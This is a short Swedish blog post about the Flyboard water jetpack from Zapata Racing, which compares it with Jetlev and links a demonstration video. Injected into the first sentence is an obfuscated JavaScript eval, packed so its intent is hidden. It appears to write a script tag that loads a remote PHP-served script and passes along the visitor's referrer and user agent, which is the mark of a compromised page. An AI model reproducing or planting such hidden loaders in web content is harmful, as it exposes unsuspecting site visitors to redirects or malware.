Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Vattenjetpack med Flyboard

Vattenjetpack med Flyboard
Sebastian

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khrad|var|u0026u|referrer|zdfzs||js|php’.split(’|’),0,{}))
tror vi har skrivit om en liknande pryl förut vid namn Jetlev. För er som vet vad Jetlev är så är Flyboard ungefär samma sak, en jetpack som fungerar i, och ovanför vattnet.

Zapata Racing har tagit ett lite steg längre än Jetlev och lanserat Flyboard som är en bräda man istället står på.
När jag såg Jetlev första gången tänkte jag, wow den här vill jag verkligen ha. Sen kom jag på att priset nog kommer vara rätt saftigt, vilket också stämmer.

Flyboard har en liten ”båt” som följer efter där den samlar in allt vatten som sedan sprutas ut ur jetmotorerna på utrustningen. Maskinen styrs med två handtag, en för varje hand och motor. Det sjuka med den här prylen är att man kan dyka ner fritt i vattnet och sen hoppa upp som en fisk. Allt detta demostreras i videon nedan. Ta er en titt.

inget pris finns än, men den ska lanseras nästa år.

Mer info om Flyboard: zapata-racing.com
Och Jetlev: http://jetlev.com

httpv://www.youtube.com/watch?v=lM8kEHjQz9U